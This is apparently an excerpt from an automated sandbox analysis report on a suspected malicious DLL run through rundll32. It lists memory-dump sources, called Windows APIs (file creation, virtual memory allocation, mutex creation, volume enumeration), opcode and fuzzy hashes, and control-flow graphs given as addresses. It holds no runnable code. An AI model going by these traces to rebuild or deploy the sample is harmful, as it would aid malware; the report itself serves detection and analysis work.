                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectorySystem
                          • String ID:
                          • API String ID: 2188284642-0
                          • Opcode ID: c6e345f869e546ca9fe15d0045b6cee613ae8a71a015e53a8d63059213df4238
                          • Instruction ID: cdce891bcc28b7c58dbfb8154f0388fc460b9d7cdf0204d6071d05bc97a534a3
                          • Opcode Fuzzy Hash: c6e345f869e546ca9fe15d0045b6cee613ae8a71a015e53a8d63059213df4238
                          • Instruction Fuzzy Hash: 673121A291CE8285E670DB31E94477EA366FB88374F501275E69E426E9EF3CF504C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID: @
                          • API String ID: 2167126740-2766056989
                          • Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                          • Instruction ID: c5e4a80a00303216d43e6e5b7d430594d5d95f5d0b6b4d19b49ebf601381a04c
                          • Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                          • Instruction Fuzzy Hash: C7E039B2A28A8082D7409F25E45474BF361FB847B4F802321FAAD46BD8CFBCD1088F00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateFileMemoryReadVirtual
                          • String ID:
                          • API String ID: 1637922817-0
                          • Opcode ID: d344508d4f2c3a49d2145ecb8a5c4f55c08f83937ad1c805af4b53b3c1d0ab86
                          • Instruction ID: 31385ccfd7b885f73d2a93d32337849d9ebc5ab963b2a5f59c7f07d345d2034f
                          • Opcode Fuzzy Hash: d344508d4f2c3a49d2145ecb8a5c4f55c08f83937ad1c805af4b53b3c1d0ab86
                          • Instruction Fuzzy Hash: 42212672618BC48AD760CB64E44035AB7E6F3887A0F908035EB8C83B68EF7DD454CB40
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileInitStringUnicode
                          • String ID:
                          • API String ID: 2498367268-0
                          • Opcode ID: b4ce941c2864adbb6bfc33cf0ff5b1ab23669a0153671a54977759b806072ccd
                          • Instruction ID: 83eb750f3fa063976d730e5ff59720c40afaaa32ae952e660427bb71cbcd221e
                          • Opcode Fuzzy Hash: b4ce941c2864adbb6bfc33cf0ff5b1ab23669a0153671a54977759b806072ccd
                          • Instruction Fuzzy Hash: D201E9B260CA41C2D630EB25E44062AB7B1FB89798F500125FACC47A59EF3EEA41CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                          • Instruction ID: ee3b4fba0c18d1d45adbf484d79e2135a06448f729822e285d9af020e683fe59
                          • Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                          • Instruction Fuzzy Hash: 52F0E77691CB9187D360DB64F44474BB7A1F788354F604125E6C982F68DBBDD1948F40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: e5e37327634925ee1ef5c7428c8281c029602c3e86e7ce43f93336db0cdaa954
                          • Instruction ID: cd62fd9d5d7cdbf0957b064c41ef706b1cc50fb90f17ac75bde9f96c06fae144
                          • Opcode Fuzzy Hash: e5e37327634925ee1ef5c7428c8281c029602c3e86e7ce43f93336db0cdaa954
                          • Instruction Fuzzy Hash: A2F04FB162CA4286E7709B20E44076A6761FBC87BCF500334F6AD46AD9DF3DE2448B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateFileInitStringUnicode
                          • String ID:
                          • API String ID: 3299502662-0
                          • Opcode ID: 2a325927e8b0f49e9fcb8e1ef271486310447e0530a1ee6d17eb98cbba67d7f7
                          • Instruction ID: dd630fae5a0f0818946aaa7a259a2ec077cea01937f3d7f440205b87c81360b2
                          • Opcode Fuzzy Hash: 2a325927e8b0f49e9fcb8e1ef271486310447e0530a1ee6d17eb98cbba67d7f7
                          • Instruction Fuzzy Hash: AFF0C9B2A08A8187D720DB25E44161ABB71F799798F400225EACC47A69DB3DE6558F40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeMemoryVirtual
                          • String ID:
                          • API String ID: 3963845541-0
                          • Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                          • Instruction ID: b98c177195ffcd41e3c25dc545ddc7c3299d42e4a0c805b3a21d7f7aaecbecb3
                          • Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                          • Instruction Fuzzy Hash: F0E0E675908E8182D7609B60E44475A7770F785374F944325E7F951AE4CF7CD14ACF01

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 107 7ffb1e8633ac-7ffb1e863402 call 7ffb1e8630d0 110 7ffb1e86340b-7ffb1e86341b call 7ffb1e863250 107->110 111 7ffb1e863404-7ffb1e863406 107->111 115 7ffb1e863421-7ffb1e86345c call 7ffb1e86bc64 call 7ffb1e86bb2c call 7ffb1e866b9c * 2 call 7ffb1e867588 110->115 116 7ffb1e86371c 110->116 112 7ffb1e86371e-7ffb1e863725 111->112 127 7ffb1e863712-7ffb1e863717 call 7ffb1e867b40 115->127 128 7ffb1e863462-7ffb1e86349f call 7ffb1e86bc64 call 7ffb1e86bb2c call 7ffb1e866b9c call 7ffb1e867504 115->128 116->112 127->116 138 7ffb1e8634a1-7ffb1e8634a3 128->138 139 7ffb1e8634a8-7ffb1e8634bf call 7ffb1e86ae78 128->139 138->112 142 7ffb1e8634d0-7ffb1e8634d8 139->142 143 7ffb1e8634c1-7ffb1e8634ce 139->143 144 7ffb1e8634dd-7ffb1e8634f7 wsprintfW 142->144 143->144 145 7ffb1e8634fd-7ffb1e863514 call 7ffb1e86ae78 144->145 146 7ffb1e863597-7ffb1e8635ae call 7ffb1e86ae78 144->146 151 7ffb1e863516-7ffb1e863523 145->151 152 7ffb1e863525-7ffb1e86352d 145->152 153 7ffb1e8635b0-7ffb1e8635bd 146->153 154 7ffb1e8635bf-7ffb1e8635c7 146->154 156 7ffb1e863532-7ffb1e863561 wsprintfW call 7ffb1e86ae78 151->156 152->156 155 7ffb1e8635cc-7ffb1e8635f6 wsprintfW call 7ffb1e86ae78 153->155 154->155 161 7ffb1e8635f8-7ffb1e863605 155->161 162 7ffb1e863607-7ffb1e86360f 155->162 163 7ffb1e863572-7ffb1e86357a 156->163 164 7ffb1e863563-7ffb1e863570 156->164 165 7ffb1e863614-7ffb1e863639 wsprintfW 161->165 162->165 166 7ffb1e86357f-7ffb1e863592 wsprintfW 163->166 164->166 167 7ffb1e86363f-7ffb1e8636aa call 7ffb1e863728 call 7ffb1e867b40 * 3 call 7ffb1e863c2c call 7ffb1e863a24 call 7ffb1e86ad34 165->167 166->167 182 7ffb1e8636ac-7ffb1e8636c5 call 7ffb1e86ba98 167->182 183 7ffb1e863703-7ffb1e863705 ExitProcess 167->183 186 7ffb1e8636c7-7ffb1e8636e5 call 7ffb1e86ba98 * 2 182->186 187 7ffb1e8636ea-7ffb1e8636fe call 7ffb1e86b400 call 7ffb1e867b40 182->187 186->187 187->183
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 97ef69e3b8279a3df4421783dbe62d74182787a1ea8c2965100cf336d0c126f3
                          • Instruction ID: a985ec8887e4fe7c2043975b9aa80c707edde3b3dcc903df90397c71db03276e
                          • Opcode Fuzzy Hash: 97ef69e3b8279a3df4421783dbe62d74182787a1ea8c2965100cf336d0c126f3
                          • Instruction Fuzzy Hash: 189106A2A1DF8695EA50DB20E4513AAB362FFC9394F901035E68E436A9DF3CF545CB40

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: b6b8473d3cfbd10d9387e75cea738af656ed7c38e007c94938ca2057f07301e4
                          • Instruction ID: 2c21aaf38d4375db3a64aa631d820cff5cdb20c325eb216906da15025063964c
                          • Opcode Fuzzy Hash: b6b8473d3cfbd10d9387e75cea738af656ed7c38e007c94938ca2057f07301e4
                          • Instruction Fuzzy Hash: 6851FE75A0CE4182E6509B29F45036AB761FBC57B4F100235EA9D47BE8DF7DE485CB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 237 7ffb1e863868-7ffb1e86388f call 7ffb1e86ae1c call 7ffb1e866328 242 7ffb1e863891-7ffb1e863896 237->242 243 7ffb1e86389b-7ffb1e8638a2 call 7ffb1e863074 237->243 244 7ffb1e863a1a-7ffb1e863a21 242->244 247 7ffb1e8638ae-7ffb1e8638bf call 7ffb1e868560 call 7ffb1e868820 243->247 248 7ffb1e8638a4-7ffb1e8638a9 243->248 253 7ffb1e8638d2-7ffb1e8638da call 7ffb1e868820 247->253 254 7ffb1e8638c1-7ffb1e8638c6 247->254 248->244 258 7ffb1e8638dc-7ffb1e8638e1 253->258 259 7ffb1e8638ed-7ffb1e86390e GetCurrentProcess IsWow64Process 253->259 254->253 255 7ffb1e8638c8-7ffb1e8638cd 254->255 255->244 258->259 260 7ffb1e8638e3-7ffb1e8638e8 258->260 261 7ffb1e863910-7ffb1e863915 259->261 262 7ffb1e86391a-7ffb1e863921 call 7ffb1e8668e8 259->262 260->244 261->244 265 7ffb1e86392d-7ffb1e863941 call 7ffb1e86ae78 262->265 266 7ffb1e863923-7ffb1e863928 262->266 269 7ffb1e86394f-7ffb1e863954 265->269 270 7ffb1e863943-7ffb1e86394d 265->270 266->244 271 7ffb1e863959-7ffb1e863977 CreateMutexW 269->271 270->271 272 7ffb1e86398d-7ffb1e86399a 271->272 273 7ffb1e863979-7ffb1e86398b GetLastError 271->273 272->244 273->272 274 7ffb1e86399c-7ffb1e8639b3 GetModuleHandleW call 7ffb1e86463c 273->274 277 7ffb1e8639bc-7ffb1e8639c3 call 7ffb1e866988 274->277 278 7ffb1e8639b5-7ffb1e8639ba 274->278 281 7ffb1e8639cc-7ffb1e8639d3 call 7ffb1e866864 277->281 282 7ffb1e8639c5-7ffb1e8639ca 277->282 278->244 285 7ffb1e8639dc-7ffb1e8639e8 call 7ffb1e86cf14 call 7ffb1e86378c 281->285 286 7ffb1e8639d5-7ffb1e8639da 281->286 282->244 291 7ffb1e8639fb 285->291 292 7ffb1e8639ea-7ffb1e8639f4 call 7ffb1e8633ac 285->292 286->244 294 7ffb1e863a05-7ffb1e863a16 call 7ffb1e866250 291->294 295 7ffb1e8639f9 292->295 294->244 295->294
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
                          • Instruction ID: 885560a8a6f757daf64e62a1116eb70e8a360f9bc040e2aa847cf7517986a039
                          • Opcode Fuzzy Hash: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
                          • Instruction Fuzzy Hash: 7E4107E0D0CE4386FA609B34E8053796293BF89379F100635E5AE966E6DF3CF4499A01

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenRtlp
                          • String ID: 0$@
                          • API String ID: 2893929204-1545510068
                          • Opcode ID: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
                          • Instruction ID: 425dbfb6f62488dc255f86ebb0a38bcb6140d7aa2514303785d7f7a5b9e9f3f2
                          • Opcode Fuzzy Hash: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
                          • Instruction Fuzzy Hash: D4018FB2618A8182D760CF20E44039BBBA4F7C43A8F904134E6CE82A69DF3CE645CF40

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID:
                          • API String ID: 2922976086-0
                          • Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                          • Instruction ID: 8be75cbced9050d8a65f964fab838bbeee4bd552cfaf01f9aa1604115304e64a
                          • Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                          • Instruction Fuzzy Hash: D8112B72A0CA8187E7A0CB64F45476BB7A1F7C8364F504135E68D82AA8DF7CE549CF00

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Volume$Find$CloseFirstInformation
                          • String ID:
                          • API String ID: 586543143-0
                          • Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                          • Instruction ID: a0fb4abf9606313877a5b80fd3c689c0db1613ea825a2609a067261900fb4f52
                          • Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                          • Instruction Fuzzy Hash: 921103B5A2CE4196E760DB20F4843AAB371F7C4360F540236E69D426E8DF7CE549CB00

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseEventFindMutexNotificationRelease
                          • String ID:
                          • API String ID: 241605031-0
                          • Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                          • Instruction ID: 96a543d2c8db114f885dbfa00a7e0ef110916cc6d99da9d92c627f62031c674f
                          • Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                          • Instruction Fuzzy Hash: FDF052A8D1CE42C2E6909B24E9583352762FF8476CF400135D94EA2270CF7CB98ACA15
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ccae81713694e4cd90fb5a0d31536c55cbee103d7af4e1c7cb79f72cbb0b4ef8
                          • Instruction ID: 3bee21af479dca2495484dd0e3275b21ba432cc97b6f04f0c8c3a1946523c51c
                          • Opcode Fuzzy Hash: ccae81713694e4cd90fb5a0d31536c55cbee103d7af4e1c7cb79f72cbb0b4ef8
                          • Instruction Fuzzy Hash: 35712AB191CE8681EB50DB24F4503AAB762FBC8394F501136E68D47AA9DF7CF585CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentFormatFreeMemoryPathUserVirtual
                          • String ID:
                          • API String ID: 2593304397-0
                          • Opcode ID: 86c1636f8196c67e737ffc1610daef22f7835d658f7e32d4e91e4803e8f92b83
                          • Instruction ID: 4f95dd7d2d45f3f9a28cfccc98eec7969ba6e8285a04147e1bfa38f750328f3f
                          • Opcode Fuzzy Hash: 86c1636f8196c67e737ffc1610daef22f7835d658f7e32d4e91e4803e8f92b83
                          • Instruction Fuzzy Hash: 6821D3E2A2CD4391EB609B31E45137AA362FF9C3A8F504535E6CE825A9EF2CF505C701
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: MemoryVirtual$AllocateFileFreeModuleName
                          • String ID:
                          • API String ID: 1369786923-0
                          • Opcode ID: 142c038aa201e52e575b6126af4ec832a872663e7ba2b392c7bc3b98985ecee4
